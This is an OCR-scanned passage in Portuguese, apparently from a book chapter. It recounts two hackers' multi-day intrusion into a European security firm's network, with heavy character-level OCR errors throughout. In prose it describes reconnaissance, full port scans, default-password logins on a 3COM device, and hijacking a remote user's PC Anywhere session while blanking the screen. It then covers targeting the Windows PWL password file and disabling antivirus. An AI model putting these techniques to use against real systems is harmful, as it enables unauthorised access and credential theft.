trabalhando febrilmente em sua mesa, mas num clima bem descontraldo. 

Nessa sala, entre os outros, esta um sujeito que vamos chamar de Louis. Ele cresceu em uma pequena 
cidade isolada no norte da Inglaterra e comeęou a mexer com computadores por volta dos sete anos* quando 
seus pais compraram uma velha maquina para que os filhos pudessem aprender tecnologia. Ele comeęou a 
fazer hacking quando era estudante, ao achar por acaso uma folha 
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impressa com nomes de usuarios e senhas, o que aguęou sua curiosidade. Seu hacking lhe trouxe problemas cedo, 
ąuando um estudante mais velho (um 'bedel') 'entregou' Louis. Mas ser pego nao o impediu de aprender os segredos 
dos computadores. 

Alto, de cabelo escuro, Louis nao acha muito tempo para os 'esportes ingleses' — criąuete e futebol — de que 
gostava tanto quando era estudante. 

Mergulhando 

Tempos atras, Louis e seu colega Brock, mexendo em um computador, desenvolveram um projeto. O alvo deles 
era urna empresa com sede em um pais da Europa — essencialmente, urna empresa de seguranęa que fazia 
transferencia de grandes somas em dinheiro, alem do transporte de prisioneiros da prisao para o tribunal ou para 
outra prisao. (A ideia de urna empresa fazer tanto transferencias de dinheiro quanto o transporte de prisioneiros e 
assustadora para os norte-americanos, mas os ingleses e os europeus consideram isso normal.) 

Soa como um desafio particularmente grandę qualquer empresa que, ao descrever suas metas, inclua entre elas a 
palavra 'seguranęa'. Se ela esta envolvida com seguranęa, isso significa que se preocupa tanto com o assunto que nao 
deveria sofrer nenhuma forma de invasao, certo? Para qualquer grupo de garotos com mentalidade de hacker, esse 
deve parecer um desafio irresistivel, especialmente quando, como nesse caso, eles nao tern nada para iniciar a 
faęanha, alem do nome de sua empresa-alvo. 

"Tratamos isso como um problema a ser resolvido. Entao, a primeira coisa que fizemos foi descobrir o maximo 
de informaęoes possivel sobre essa empresa", conta Louis. Eles comeęaram a examina-la, usando ate o Google para 
traduęao, urna vez que nenhum deles falava a lingua do pais onde a empresa estava sediada. 

As traduęoes automaticas eram suficientes para lhes dar urna noęao do que fazia aquela empresa e do quanto era 
grandę. Alem de eles nao se sentirem muito a vontade para fazer ataques de engenharia social, essa possibilidade foi 
descartada de qualquer modo, por causa da barreira da lingua. 

Eles conseguiram mapear os intervalos de endereęo de IP atribuidos publicamente a organizaęao, a partir dos 
endereęos de IP do site Web da empresa e de seu mail server, bem como do registro de endereęo IP europeu, Reseaux 
IP Europeens (Ripe), que e parecido com o American Registry of Internet Numbers (Arin), nos Estados Unidos. (Arin 
e a organizaęao que gerencia numeros de endereęo IP para os Estados Unidos e territórios atribuidos. Urna vez que os 
endereęos da Internet devem ser exclusivos, ha necessidade de certa organizaęao para controlar e alocar blocos de 
numero de endereęo IP. A organizaęao Ripe gerencia numeros de endereęo IP para territórios europeus.) 

O principal site Web, como eles vieram a saber, era extemo, com urna empresa hosting de fora. Mas o endereęo 
IP de seu servidor de e-mail tinha sido registrado na própria empresa e localizado dentro do intervalo de endereęos 
corporativos. Logo, os garotos podiam solicitar o servidor Domain Name Service (DNS) de autoria da empresa para 
obter os endereęos IP, examinando os registros de troca de correspondencias. 

Louis tentou a tecnica de enviar um e-mail para um endereęo inexistente. Recebeu urna mensagem de volta 
avisando que seu e-mail nao pode ser entregue e trazendo informaęoes no cabeęalho 
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que revelariam alguns endereęos IP intemos da empresa, bem como ratearia informaęoes de e-mail. Nesse caso, no 
entanto, o que Louis recebeu foi uma 'devoluęao' de sua caixa postał extema; seu e-mail só havia chegado ao servidor 
extemo, por isso a resposta 'undeliverable' nao forneceu informaęoes uteis. 

Brock e Louis sabiam que tudo ficaria mais facil se a empresa estivesse realizando o host de seu próprio DNS. 

Nesse caso, eles tentariam fazer solicitaęoes para obter mais informaęoes sobre a rede interna da empresa ou tirariam 
vantagem de qualquer vulnerabilidade associada a sua versao de DNS. A noticia nao era boa: seu DNS estava em outro 
lugar, presumivelmente localizado em seu ISP (ou, para usar a terminologia inglesa, seus 'telecoms'). 

Mapeando a rede 

Na etapa seguinte, Louis e Brock usaram uma consulta reversa do DNS para obter os nomes de hosts de varios 
sistemas localizados dentro do intervalo de endereęos IP da empresa (conforme explicado no Capitulo 4). Para fazer 
isso, Louis usou "um script PERL simples" que os caras tinham escrito. (Mais comumente, os atacantes usam 
software ou sites Web disponiveis para consultas de DNS reversos, como www.samspade.org .) 

Eles notaram que "havia nomes bastante informativos vindos de alguns dos sistemas", que eram uma pista de que 
funęao aqueles sistemas tinham dentro da empresa. isso tambem nos deu ideia da mentalidade do pessoal de TI que 
trabalhava la. "Parecia que os administradores nao tinham pleno controle das informaęoes que foram disponibilizadas 
sobre sua rede, e essa e a primeira fasę de intuięao, porque lhe diz se voce conseguira ou nao obter acesso." Brock e 
Louis acharam que os sinais pareciam favoraveis. 

Esse e um exemplo de como se tenta fazer uma analise do modo de pensar dos administradores, tentando supor 
como eles raciocinariam para arquitetar a rede. Para esse atacante em particular, "ele se baseava em parte no 
conhecimento sobre as redes e as empresas que tinhamos visto na Europa, no nivel de conhecimento de TI que eles 
tinham e no fato de que as pessoas no pais talvez estivessem um ano e meio a dois anos atrasadas em relaęao ao Reino 
Unido". 

Identificando um roteador 

Eles analisaram a rede usando o 'flavour' de Unix de 'traceroute', que fomece uma conta do numero de roteadores 
pelos quais passa um pacote de dados para atingir um destino especifico; no jargao, ele e referido como o numero de 
'hops'. Eles podem traęar a rota ate o servidor de e-mail e o firewall border. Traceroute relatou que o servidor de e- 
mail estava um hop atras do firewall. 

Essa informaęao lhes deu uma pista de que o servidor de e-mail estava na DMZ, ou todos os sistemas atras do 
firewall estavam na mesma rede. (DMZ e a chamada zona desmilitarizada — uma rede eletrónica do tipo 'terra de 
ninguem' que se situa entre dois firewalls e que costuma ser acessivel tanto da rede interna quanto da Internet. O 
propósito da DMZ e proteger a rede interna, caso qualquer um dos sistemas expostos a Internet seja comprometido.) 

Eles sabiam que o servidor de e-mail tinha a porra 25 aberta e, ao fazerem um traceroute, tambem descobriram 
que podiam realmente penetrar no firewall para se comunicar com o servidor de 
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e-mail. "Vimos que o caminho nos levava por esse dispositivo router* e passaria pelo próximo hop que 
parecia desaparecer, que de faro era o firewall, e, entao, um hop atras daquele vimos o servidor de e-mail, 
por isso tivemos uma ideia inicial de como a rede tinha sido arquitetada." 

Louis disse que muitas vezes eles comeęavam tentando algumas portas comuns provavelmente deixadas 
abertas por firewalls, e ele nomeou alguns servięos, como porta 53 (usada pelo DNS), porta 25 (o servidor 
de e-mail SMTP), porta 21 (FTP), porta 23 (telnet), porta 80 (http), portas 139 e 445 (ambas usadas para 
NetBIOS, em diferentes yersoes do Windows). 

Antes de fazermos yarreduras de porta intrusivas, estayamos muito interessados em nos 
certificar de que tfnhamos uma lista-alvo efetiya que nao incluia endereęos IP de sistemas que 
nao estayam sendo usados. Nos estagios iniciais, voce precisa ter listas-alvo para nao sair as 
cegas simplesmente escaneando cada endereęo IE Depois de fazermos nossa enumeraęao de 
alvos, llcamos com cinco ou seis sistemas finais que queriamos examinar melhor. 

Nesse caso, eles descobriram somente tres portas abertas: um seryidor de e-mail, um seryidor Web com 
todos os patches de seguranęa instalados, que aparentemente nao estavam sendo usados, e, na porta 23, o 
seryięo telnet**. Quando tentaram entrar via telnet, tiveram o prompt tipico da senha Cisco "User Access 
Verification". Para eles, isso significou um pequeno progresso — pelo menos haviam identificado a caixa 
como dispositivo Cisco. 

No roteador da Cisco, Louis sabia por experiencia própria que a senha escolhida e freqiientemente 
alguma coisa bem óbvia. "Nesse caso, tentamos tres senhas — o nome da empresa, espaęo em branco e 
cisco, e nao conseguimos entrar naquele roteador. Entao, em vez de criar tumulto nesse ponto, decidimos 
parar de tentar acessar o seryięo." 

Eles tentaram escanear o dispositivo da Cisco para algumas portas comuns, mas nao chegaram a lugar 
nenhum. 

Entao, naquele primeiro dia, passamos muito tempo analisando a empresa e sua rede, e 
comeęamos a fazer yarreduras iniciais de porta. Eu nao diria que estayamos prontos para 
desistir, porque ainda havia alguns recursos que com certeza iriamos experimentar outra vez 
antes de pensarmos realmente em desistir. 

A soma total de seus resultados para um dia inteiro de esforęo nao foi muito alem da identificaęao de um 
unico roteador. 

O segundo dia 

Louis e Brock, no segundo dia, estayam prontos para comeęar a fazer uma varredura mais intensa da 
porta. Usando o termo sewięos para se referir a portas abertas, Louis explicou: 


Programa ou computador responsavel por interligar duas ou mais redes (N. da R. T.). 

Telnet e um protocolo para controlar remotamente outra maguina de gualguer lugar na Internet (N. da R. T.). 
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A essa altura, estayamos pensando que precisayamos encontrar mais servięos naąuelas 
maquinas. Entao aumentamos um pouco o yolume e tentamos encontrar alguma coisa que 
realmente nos ajudasse a entrar na rede. O que vimos era que certamente havia um bom 
firewall filtrando no local. Estayamos mesmo procurando alguma coisa que estaria [sendo] 
permitida por erro e/ou alguma coisa que fosse mai configurada. 

Entao, usando o programa Nmap, uma ferramenta-padrao para a varredura de porta, eles fizeram uma 
yarredura com o arquivo de servięos-padrao do programa, que procurava cerca de 1.600 portas; novamente 
chegaram a um saco vazio — nada significativo, 

"Entao, o que fizemos foi uma yarredura completa da porta, escaneando tanto o roteador quanto os 
seryidores de e-mail." Uma yarredura completa da porta significava examinar mais de 65 mil portas. 
"Estayamos escaneando toda porta TCP e procurando qualquer seryięo possivel nos hosts que tinhamos em 
nossa lista-alvo naquele ponto." 

Dessa vez eles encontraram algo interessante, apesar de estranho, e que causou certa perplexidade. 

A porta 4065 estava aberta. E incomum encontrar uma porta tao alta em uso. Louis explicou: "O que 
pensamos naquele momento foi que talvez eles tivessem o seryięo telnet configurado na porta 4065. Logo, o 
que fizemos foi entrar com a telnet naquela porta e ver se podiamos yerificar aquilo". Usando a telnet, Louis 
conectou-se a porta remota, que entao aceitou comandos de seu computador e respondeu com o resultado 
exibido diretamente em sua tela. 

Quando eles tentaram se conectar a ela, receberam de volta uma solicitaęao para um nome de login e 
senha. Logo, eles estavam certos de que a porta estava sendo usada para o seryięo telnet — mas o dialogo 
para a autenticaęao de usuario era bem diferente daquele apresentado por um seryięo telnet da Cisco. "Depois 
de um tempo, identificamos isso como algum dispositiyo 3COM. Essa descoberta estimulou de yerdade 
nosso entusiasmo pelo trabalho, porque nao era ffeqiiente voce encontrar uma caixa Cisco que se parecesse 
com algum outro dispositiyo ou outro seryięo listado numa porta alta TCP." Mas o fato de o seryięo telnet na 
porta 4065 estar sendo executado como um dispositiyo 3COM nao fazia sentido para eles. 

Tinhamos duas portas abertas em um dispositiyo; eles identificaram-se como dispositiyos 
completamente diferentes, feitos por fabricantes diferentes. 

Brock encontrou a porta TCP alta e a conectou usando a telnet. "Depois que ele conseguiu um prompt de 
login, eu gritei para tentar admin [para o nome de usuario], com as senhas usuais suspeitas, como password, 
admin e blank. Ele tentou varias combinaęóes dessas tres palavras, como nome do usuario e senha, e acertou 
em cheio depois de somente algumas tentatiyas: o nome do usuario e a senha no dispositiyo 3 COM eram 
ambos admin. "Naquele ponto, ele gritou avisando que tinha entrado", disse Louis, o que significava que 
agora eles estavam habilitados a ter o acesso telnet ao dispositiyo 3COM. O fato de ser uma conta 
administratiya tomava as coisas ainda melhores. 


I 
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Uma vez que adivinhamos a senha, aąuele era o inicio do trabalho. 

Era a agitaęao costumeira. Estayamos operando em diferentes estaęoes de trabalho. 

Inicialmente, enąuanto faziamos a yarredura de rede e de enumeraęao, ficayamos 
em nossas próprias maąuinas, trocando informaęoes entre nós. Mas, depois que ele 
encontrou a porta que lhe deu acesso aquele prompt de login, fui ate a maquina dele 
e comeęamos a trabalhar Juntos nela. 

Foi incrivel. Era um dispositivo 3COM. Tivemos acesso console a ele e talvez 
tivessemos obtido uma via para investigar o que podiamos fazer. 

A primeira coisa que queriamos fazer era descobrir exatamente o que era o dispositivo 
3C0M e por que ele estava acessivel numa porta TCP alta no roteador Cisco. 

Por meio da interface linha-comando, eles conseguiram investigar informaęoes sobre o dispositivo. 
"Imaginamos que talvez alguem tivesse ligado o cabo do console desse dispositivo da 3COM no dispositivo 
Cisco e habilitado o acesso inadvertidamente." Isso fazia sentido, como um modo conveniente de os 
funcionarios poderem utilizar o telnet no dispositivo 3COM pelo roteador "Talvez nao houvesse monitores 
ou teclados suficientes no Data Center", sugere Louis, e eles tivessem improvisado um cabo como ąuebra- 
galho. Quando nao houve mais necessidade disso, o administrador que tinha ligado o cabo esqueceu-se dele. 
E foi embora, Louis imaginou, "sem imaginar as conseqiiencias de suas aęoes". 

Examinando a configuraęao do dispositivo 3C0M 

Eles agora entendiam que o dispositivo 3COM estava atras do firewall e que o erro do administrador 
tinha fomecido um path de circuito, possibilitando a um atacante conectar-se atras do firewall pela porta alta 
aberta, 

Agora que eles tinham acesso ao console 3COM, examinaram os registros de configuraęao, inclusive o 
endereęo IP atribuido a unidade, e os protocolos que estavam sendo usados para a conectividade virtual da 
rede privada, Mas descobriram que o dispositivo tambem se encontrava no mesmo intervalo de endereęo que 
o servidor de e-mail e fora de um firewall interno, na DMZ. "Concluimos que ele estava realmente atras do 
perimetro do firewall, protegido da Internet, usando algum tipo de regra de filtragem." 

Eles tentaram examinar a configuraęao do dispositivo para ver como as conexoes que chegavam eram 
configuradas, mas por aquela interface nao podiam obter informaęoes suficientes. Ainda adivinharam que, 
quando qualquer usuario se conectava a porta 4065 no roteador Cisco de algum lugar na Internet, a conexao 
provavelmente era feita do dispositivo 3COM que estava ligado ao roteador Cisco. 

Entao, aquela altura, estayamos conllantes de que conseguiriamos ter acesso as redes back end* e 
ganhariamos mais controle sobre a rede interna. Estayamos otimistas, 

* Nas aplicaęoes cliente/servidor back end refere-se a parte do programa relativa ao servidor e front end a parte 
do programa relativa ao cliente (N. da R. T.). 
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mas nos sentiamos 'muito entediados', pois ja hayiamos trabalhado quase dois dias 
inteiros. 

Fomos ao pub e conversamos sobre o dia seguinte, como seria incrivel, porąue entao 
iriamos comeęar examinando alguns sistemas finais e encontrariamos um modo de 
nos infiltrar cada vez mais na rede. 

Curiosos sobre o dispositivo 3COM, eles se puseram a capturar o log do console em tempo real. Se 
qualquer coisa acontecesse da noite para o dia, eles poderiam notar quando chegassem na manha seguinte. 

O terceiro dia 

Quando Brock inspecionou o log do console de manha, ele descobriu que varios endereęos IP tinham 
chegado. Louis explicou: 

Depois de examinar o dispositivo 3COM um pouco mais, percebemos que era um tipo de VPN 
que os usuarios remotos estayam usando para se conectar com a rede da empresa de algum 
lugar na Internet. 

Naquele ponto, certamente estayamos entusiasmados com a ideia de que teriamos acesso 
novamente, da mesma maneira que os usuarios legitimos tinham. 

Eles tentaram configurar sua própria interface VPN pessoal no dispositivo 3COM, trazendo outra 
interface na caixa 3COM, com um endereęo 1P diferente, que o firewall nao estivesse filtrando 
explicitamente. 

Nao funcionou. Eles descobriram que o dispositivo nao podia ser configurado sem corromper servięos 
legitimos. Nao podiam trazer um sistema VPN de configuraęao identica e, da maneira como a arquitetura 
tinha sido montada, ela restringia o suficiente, de modo que nao lhes era possivel fazer o que queriam. 

Logo, essa possibilidade estrategica de ataque foi abandonada rapidamente. Picamos um pouco 
desanimados, sossegamos um pouco. Mas era a primeira tentativa, e sem duvida ha sempre outro 
caminho. Ainda tinhamos incentivo suficiente, ainda tinhamos acesso a esse dispositivo, ainda 
tinhamos aquela base de operaęoes. Passamos a nos dedicar intensamente para levar isso um 
pouco adiante. 

Eles estavam na DMZ da rede da empresa, mas, quando tentaram levar conexoes de seus próprios 
sistemas, nao conseguiram mais fazer progresso. Tambem tentaram fazer urna varredura ping em toda a rede 
(tentar fazer rodo o sistema na rede cair), mas do sistema 3COM atras do firewall, para identificar qualquer 
sistema potencial e adicionar a lista-alvo. Se fossem endereęos de maquina no cache, isso significaria que um 
dispositivo estava bloqueando o acesso ao protocolo de nivel mais alto. "Depois de varias tentativas", disse 
Louis, "vimos entradas no cache ARP, indicando que algumas maquinas 
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tinham dmdgado seu endereęo de maąuina." (O ARP, Address Resolution Protocol, e um metodo para encontrar o 
endereęo fisico de um host a partir de seu endereęo IP. Cada host mantem um cache de traduęoes de endereęo para 
reduzir o atraso no encaminhamento de pacotes de dados.) 

Logo, havia, sem duvida, outras maąuinas no dominio, "mas [elas] nao estavam respondendo aos pings — o que 
era sinal classico de um firewall". 

(Para aąueles que nao estao familiarizados com o envio de pings, esta e urna tecnica de escaneamento de redes 
que envolve a transmissao de certos tipos de pacotes ICMP [Internet Control Message Protocol] para o sistema-alvo, 
a firn de determinar se o host esta ligado ou ainda e valido* Se o host estiver ligado, ele respondera com um pacote 
"ICMP echo reply".) Louis continua: "Isso parecia confirmar nossa impressao de que havia outro firewall, existia 
outro nivel de seguranęa entre o dispositivo 3COM e sua rede interna". 

Louis sentia que eles haviam chegado a um impasse. 

Tivemos acesso a esse dispositivo VPN, mas nao conseguimos instalar nosso próprio VPN por melo 
dele. Aąuela altura, o entusiasmo baixou um pouco. Comeęamos a achar que nao conseguiriamos 
realmente ayanęar na rede, E entao precisayamos fazer um brainstorm para gerar ideias novas. 

Eles decidiram inyestigar os endereęos IP que tinham descoberto no log do console. "Viamos que o próximo 
passo seria dar urna olhada para ver o que estava se comunicando remotamente a esse dispositiyo 3COM, porque, se 
fosse possivel entrar naquele dispositiyo, tambem seria possivel sequestrar urna conexao existente na rede", ou talvez 
eles conseguissem obter as credenciais de autenticaęao necessarias para se passar por um usuario legitimo. 

Eles conheciam algumas regras de filtragem, disse Louis, e estavam procurando maneiras de contomar essas 
regras no firewall. A esperanęa era que conseguissem "encontrar sistemas confiaveis e talvez alavancar para 
realmente passar por esse firewall. Os endereęos IP que estavam chegando eram de grandę interesse para nós". 

Quando eles se conectaram ao console do sistema 3COM, ele explicou, se um usuario remoto se conectasse ou 
urna mudanęa na configuraęao fosse feita, ele abriria urna mensagem de alerta no fundo da tela. "Conseguimos ver as 
conexoes feitas nesses endereęos IP." 

Os comprovantes de registro detalhavam a organizaęao a que determinados endereęos IP se registravam. Alem 
disso, esses comprovantes tambem incluiam informaęóes de contato para o pessoal tecnico e administratiyo 
responsavel pela rede da organizaęao. Usando esses endereęos, eles nova-mente yoltaram aos comprovantes de 
registro do banco de dados no Ripe, que lhes deu informaęóes sobre a que empresa pertenciam esses endereęos IR 
de fato, essa busca trouxe outra surpresa. "Descobrimos que os endereęos eram registrados a um grandę provedor 
de telecomunicaęoes dentro desse pais. Naquele momento nao podiamos juntar tudo, nao podiamos entender 
realmente o que eram esses endereęos IP, por que as pessoas estavam se conectando de urna empresa de 
telecomunicaęoes", disse Louis, usando o termo ingles para o que chamamos de ISP. Os dois rapazes comeęaram a 
imaginar se as conexoes VPN seriam de usuarios remotos da empresa ou alguma coisa totalmente diferente que eles 
ainda nao podiam adiyinhar. 
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Estayamos no lugar ideał para sentar e analisar aąuela massa desorganizada de informaęoes. 
Precisayamos Juntar as peęas para poder comeęar de fato a entender e tentar alguma coisa. A 
promessa do inicio da manha nao foi cumprida. Tiyemos acesso ao sistema, mas nao 
conseguimos ir alem, e achamos que nao hayiamos feito progresso durante o dia. Mas, em vez 
de simplesmente yoltarmos para casa e na manha seguinte retomarmos daąuele ponto, 
decidimos ir ao pub para tomar alguma coisa que aliyiasse o estresse e arejasse nossa mente, 
antes de pegarmos o ónibus para voltar para casa. 

Era inicio da primayera e a brisa estava fria. Saimos do escritório e fomos ate a esquina, a um 
tipo de pub ingles tradicional, bem escuro e sujo. Eu estava tomando uma ceryeja, Brock estava 
tomando schnapps de pessego e limonada — um bom drinque, voce deveria experimentar. 
Sentamos la, batemos um papo e desabafamos; o dia nao tinha transcorrido como pianej ado. 
Depois do primeiro drinque estayamos um pouco mais relaxados e pegamos um pedaęo de papel e 
uma caneta. Comeęamos a anotar algumas ideias no papel sobre o que fariamos a seguir. Ficamos 
muito animados porque conseguimos pianej ar alguma coisa. Entao, quando yoltamos de manha, 
pudemos logo nos sentar e tentar algo. Desenhamos a arquitetura de rede conforme a mapeamos 
e tentamos identificar quais os usuarios que precisariam acessar o VPN, onde estayam localizados 
fisicamente os sistemas e os provaveis passos que os implementadores do sistema pianejaram 
quando instalaram o seryięo de acesso remoto para essa empresa. 

Desenhamos os sistemas conhecidos e entao daquele ponto tentamos resolver alguns detalhes e 
descobrir onde estayam localizados alguns dos outros sistemas (ver Figura 9.1). Precisayamos 
entender em que lugar da rede o dispositiyo 3C0M estava situado. 

Louis ąueria saber quem, alem dos funcionarios intemos, tambem poderia precisar ter acesso a essa rede. 
Essa era uma empresa que tinha orgulho de sua inovaęao tecnológica, por isso Louis C Brock acharam que 
talvez eles tivessem desenvolvido um "aplicativo de distribuięao realmente excelente" que capacitaria os 
guardas a fazerem o login depois de terem feito uma entrega, para saberem qual seria a próxima retirada. 
Esse aplicativo pode ter sido programado para ser automatizado de modo que qualquer idiota pudesse usa-lo. 
Talvez o condutor clicasse um icone que diria ao aplicativo para se conectar ao seryidor de aplicativos e obter 
as ordens. 

Estayamos pensando que esses motoristas [guardas] nao deveriam ter muito conhecimento de 
computador, precisando assim de um sistema bem facil de usar. Comeęamos a pensar nisso do 
ponto de vista da empresa: que tipo de sistema seria facil de instalar, facil de manter e seguro? 

Eles pensaram num seryięo de discagem, "talvez de um computador laptop na cabine [o compartimento 
do motorista]. E a empresa teria de hospedar esses seryidores onde entramos, ou precisaria 



A arte de irwadir 


W®# di ItfMU HM 1 



lomuMo 

fiiipi m ^ 


IM* A ^111,4 



w |^h di iMkn 


Figura 9.1: llustraęao do que os dois hackers acharam que poderia ser a configuraęao, que explicaria o que eles 
tinham observado sobre a rede e as operaęóes. 


terceiriza-los. Formulamos a hipótese de que a empresa terceirizada seria de telecomunicaęoes, e as 
informaęoes teriam de passar dessa empresa para nossa empresa-alvo, e esta teria de passar para a Internet 
por um tunel VPN". Eles imaginaram que os guardas chamariam no ISP e autenticariam la antes de obterem 
permissao para se conectarem na rede da empresa-alvo, Mas havia ainda outra possibilidade. Louis 
prosseguiu: 

Levantamos a seguinte hipótese; "Vamos ver se podemos elaborar uma arąuitetura pela qual 
um sujeito em uma van possa discar, passar suas credenciais de autenticaęao e elas serem 
realmente autenticadas pela empresa-alvo, e nao pelo provedor de telecomunicaęoes. Como 
aquela empresa VPN poderia ser conilgurada de modo que qualquer informaęao que fosse 
transmitida do guarda para a empresa-alvo nao passasse pela Internet sem ser criptografada?" 

Eles tambem tentaram imaginar como a empresa autenticaria os usuarios. Se um guarda precisa discar 
para um desses sistemas localizados na empresa de telecomunicaęoes e autenticar para essa empresa, eles 
raciocinaram, entao os servięos de autenticaęao estavam simplesmente sendo terceirizados. Talvez houvesse 
outra soluęao, pela qual o host dos servidores de autenticaęao fosse a empresa-alvo, e nao o provedor de 
telecomunicaęoes, pensaram. 
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Freąuentemente, a tarefa de autenticaęao e repassada para um servidor separado que fomece essa funęao. 
Talvez o dispositivo 3COM estivesse sendo usado para acessar um servidor de autenticaęao na rede interna 
da empresa-alvo. Chamando de um modem celular, um guarda se conectaria ao ISP, seria passado para o 
dispositivo 3COM e seu nome de usuario e senha seriam enviados ao outro servidor, para autenticaęao. 

Logo. a hipótese deles nesse ponto era que, quando um guarda de seguranęa iniciava urna conexao por 
discagem, ele estabelecia um VPN entre ele mesmo e o dispositivo 3COM. 

Louis e Brock imaginaram que, para ganhar acesso a rede interna, eles primeiro teriam de obter acesso ao 
sistema de telecomunicaęoes no ISP com o qual os motoristas de vans se conectavam. Mas "urna coisa que 
nao sabiamos eram os numeros de telefone desses dispositivos de discagem. Eles estavam localizados em um 
pais estrangeiro e nao sabiamos que tipo de linhas de telefone eram, e nao tinhamos muita chance de 
encontrar a informaęao sozinhos. A unica coisa boa que sabiamos era que o tipo de protocolo para o VPN era 
PPTP". Isso era significativo, porque a instalaęao VPN padrao da Microsoft só usa um segredo partilhado, o 
qual realmente e o login e senha do Windows ao servidor ou dominio. 

A essa altura eles tinham tornado alguns drinques e decidido adotar urna "abordagem totalmente aberta 
para resolver o problema. 

Nesse estagio, voce vai guardar esse pedaęo de papel onde anotou tudo, porąue esse poderia ser 
realmente um bom hack, se consegufssemos entrar. E sentiamos certo orgulho quando 
pensavamos como irfamos fazer isso. 

Alguns pensamentos sobre 'intuięao de hackers' 

A intuięao que os dois tiveram naquela noite se revelaria bastante exata. Louis comentou sobre esse 
insight que os bons hackers parecem ter: 

E muito dificil explicar o que o leva a pressentir isso. Simplesmente vem da experiencia 
e da analise do modo como os sistemas sao configurados, 

Brock, desde um estagio bem inicial, tinha um feeling de que deveriamos continuar 
com essa coisa, porque achava que teriamos um resultado da pesquisa. E muito 
dificil de explicar. Intuięao de hacker? 

Voce ve algumas informaęoes e o modo como as coisas sao formuladas, e comeęa a 
ter um pequeno insight da empresa e das pessoas responsaveis pelos sistemas de 
TI. E havia essa ideia de que eles entendiam de seguranęa, mas talvez estivessem 
fazendo alguma coisa errada. 

Minha opiniao sobre o assunto 6 que os hackers descobrem como as redes e os sistemas geral-mente sao 
configurados no ambiente de negócio por meio de investigaęoes. Com a experiencia, voce acaba sabendo 
como pensam os administradores de sistemas e os implementadores. E como um jogo de xadrez, em que voce 
esta tentando superar ou fazer urna jogada mais inteligente que seu oponente. 
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Logo, acho que o que esta realmente em jogo baseia-se na experiencia de como os administradores de 
sistema configuram redes e nos erros comuns que cometem. Talvez Louis estivesse cerco em seus primeiros 
comentarios sobre o assunto: o que algumas pessoas chamam de intuięao, pode-se definir melhor como 
experiencia. 

O quarto dia 

Na manha seguinte, quando eles chegaram, sentaram-se la e ficaram observando o log do console no 
dispositivo 3COM, esperando que as pessoas se conectassem. Cada vez que alguem se conectava, eles 
escaneavam o mais rapido que podiam o endereęo IP que estava fazendo a conexao de entrada. 

Eles descobriram que essas conexoes duravam talvez um minuto, aproximadamente, e entao eram 
finalizadas. Se estivessem certos, um guarda discava, pegava sua ordem e entao voltava a trabalhar off-line, 
o que significava que eles teriam de agir com muita rapidez. "Quando viamos esses endereęos IP 
aparecerem, tinhamos realmente de bater o sistema do cliente", Louis comentou, usando 'bater' no sentido de 
apertar as teclas com a adrenalina a mil, como quando se joga um excitante gamę no computador. 

Eles selecionaram algumas portas para servięos que poderiam ser vulneraveis, esperando encontrar urna 
que pudesse ser atacada, como urna telnet, um servidor FTP ou um servidor Web nao seguro. Ou talvez 
pudessem ganhar acesso para abrir shares no NetBIOS. Tambem procuraram programas desktop remotos, 
baseados em GUI, como o WinVNC e o PC Anywhere. 

Mas a manha foi passando e, alem de alguns hosts, eles nao viam nenhum servięo sendo executado. 

Nao estayamos realmente chegando a lugar nenhum, mas continuamos la sentados, escaneando 
toda vez que um usuario remoto se conectaya. E entao uma maquina se conectou. Fizemos urna 
yarredura de porta e encontramos uma porta aberta, normalmente usada para o PC 
Anywhere. 

O aplicativo PC Anywhere permite o controle de um computador remotamente. Mas isso só e possivel 
quando o outro computador tambem esta executando o programa, 

Vendo que a porta apareceu na yarredura, o entusiasmo parece que se renovou 
— "Ah, la esta o PC Anywhere nesta caixa. Esta poderia ser uma das maquinas de 
um usuario finał, vamos ver". 

E entao gritayamos: M Quem tem o PC Anywhere instalado?". 

Alguem respondeu alto: "Eu tenho o PC Anywhere". Entao gritei o endereęo IP para 
que ele pudesse se conectar ao sistema o mais rapido possivel. 

Louis referiu-se ao esforęo de se conectar a um sistema de PC Anywhere como "um momento muito 
decisivo". Ele sentou-se ao lado do sujeito na maquina dele enquanto uma janela apareceu na tela. 
"Inicialmente e um fundo preto", disse Louis, "e uma de duas coisas acontece: ou um prompt de senha cinza 
e exibido, ou o fundo passa para azul e um desktop Windows aparece". 
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A opęao desktop e aąuela que estayamos esperando ansiosos, com a respiraęao presa. A espera 
parecia uma eternidade ate a tela pręta desaparecer. Continuei pensando: "Esta conectando, 
esta conectando, vai interromper", "Vou conseguir um prompt de senha". 

No ultimo segundo, quando pensei "agora vem o prompt da senha", era o desktop Windows! 
Uau! Conseguimos um desktop naquela hora. Todos na sala aproximaram-se para ver. 

Minha reaęao foi: "La vamos nos de novo. Vamos agarrar essa oportunidade, nao podemos 
deixar passar". 

Entao eles conseguiram entrar no cliente que se ligava ao dispositivo 3COM. 

Nesse momento, achamos que seria 'ou vai ou racha' — sabiamos que essas pessoas estayam se 
conectando por pouco tempo e que poderiamos nao ter outra oportunidade. 

A primeira coisa a fazer foi abrir a sessao PC Anywhere e acessar dois botoes na tela, a que Louis se 
referia como "Blank, o botao da tela" e "Tranque o usuario fora do botao de console". Ele explicou:. 

Quando voce usa o PC Anywhere, pelo padrao, ambas as pessoas no desktop da maquina e a 
pessoa que esta usando o PC Anywhere podem ter acesso ao mouse e move-lo pela tela para 
executar aplicativos ou abrir arquivos, e assim por diante. Mas com o PC Anywhere voce 
realmente pode impedir que o usuario use o teclado. 

Eles fizeram isso, ganhando controle da sessao, e se certificaram de que o usuario nao veria o que 
estavam fazendo porque tinham deixado a tela branca. Louis sabia que ele nao demoraria para suspeitar ou 
pensar que estava com problemas no computador e desligar a maquina, o que significava que nao tinham 
muito tempo. 

Agora estayamos tentando resgatar nossa chance de entrar, finalmente. Nesse 
momento, tinhamos de pensar rapido para decidir o que fariamos em seguida e que 
informaęoes yaliosas poderiamos extrair dessa maquina. 

Eu pude ver que a maquina estava executando o Microsoft Windows 98 e entao o que 
tinhamos de fazer era encontrar alguem que pudesse nos dizer que informaęao eles 
poderiam ter de uma maquina Windows 98. 

Felizmente, um dos caras na sala... demonstrou interesse. Ele nao estava trabalhando 
em nosso projeto, mas sabia como obter informaęoes de sistemas. 

A primeira coisa que ele sugeriu foi examinar o arquivo lista de senha (PWL). Esse arquivo, usado com o 
Windows 95, 98 e ME, contem informaędes sigilosas, como senhas de rede e dial-up. Por exemplo, se voce 
usa a ligaęao em rede dial-up com o Windows, todos os detalhes de autenticaęao, 
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inclusive o numero dial-up, nome do usuario e senha, provavelmente sejam armazenados em um arquivo 
PWL. 

Antes de fazer o download do arquivo, eles tinham de desligar o software antmras para que ele nao 
